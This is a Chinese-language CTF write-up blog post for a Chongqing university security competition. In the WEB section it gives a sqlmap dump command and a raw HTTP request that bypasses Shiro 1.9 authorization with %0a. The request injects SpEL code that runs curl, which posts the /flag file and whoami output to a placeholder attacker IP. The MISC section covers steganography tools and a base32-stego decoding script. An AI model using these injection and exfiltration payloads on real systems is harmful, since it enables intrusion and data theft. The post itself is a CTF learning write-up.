【E3p1o1t-1】重庆市大学生信息安全竞赛 WriteUP

前言

川渝大学生信息安全竞赛(bushi
misc做得少,2个盲水印没出。

WEB

WEB3

  1. sqlmap -u "http://f47b450586d37024.node.nsctf.cn/index.php" --data "session_id=t6kvde8irh72fjte5sjdddjna0" -D level1 -T secrets -C secret --dump secret

easy_java

  1. shiro1.9 %0a绕过权限绕过
  2. spel命令执行
  3. curl文件外带
POST /admin/flag%0aa HTTP/1.1
Host: 1fe71bef758cbc4b.node.nsctf.cn
Content-Length: 104
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://1fe71bef758cbc4b.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1fe71bef758cbc4b.node.nsctf.cn/admin/flag%0aa
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

spel=T(java.lang.Runtime).getRuntime().exec('curl -X POST -F xx=@/flag <ip>:8848/?r=`whoami`')

MISC

sunflower

  1. foremost提取出2张一样的图片

  2. 盲水印解密得到flag

  3. 盲水印解密GitHub链接
    https://github.com/chishaxie/BlindWaterMark

precision

  1. file发现精度有问题

  2. 修改精度可以打开图片

  3. binwalk提取到zip文件

  4. 盲水印提取到字符串

  5. 利用字符串解压后, 得到base.txt

  6. base32隐写, 脚本一把梭。

import base64

table='ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
file = open("base.txt")
flag=''
tmpbin=''

for line in file.readlines():
    line=line.strip('\n')
    if(line[-1]=='='):
        if(line[-3]=='='):
            if(line[-4]=='='):
                if (line[-6] == '='):
                    i=table.index(line[-7])
                    b = bin(i)[2:]
                    b = b.zfill(5)
                    tmpbin+=b[-2:]
                    print(line)
                    print(b)
                else:
                    i = table.index(line[-5])
                    b = bin(i)[2:]
                    b = b.zfill(5)
                    tmpbin += b[-4:]
                    print(line)
                    print(b)
            else:
                i = table.index(line[-4])
                b = bin(i)[2:]
                b = b.zfill(5)
                tmpbin += b[-1:]
                print(line)
                print(b)
        else:
            i = table.index(line[-2])
            b = bin(i)[2:]
            b = b.zfill(5)
            tmpbin += b[-3:]
            print(line)
            print(b)

length= len(tmpbin)/8
for i in range(int(length)):
    flag+=chr(int(tmpbin[i*8:i*8+8],2))

print(tmpbin)
print(flag)

Crypto

本文链接:

https://yuno0n.top/index.php/archives/62/
1 + 8 =
快来做第一个评论的人吧~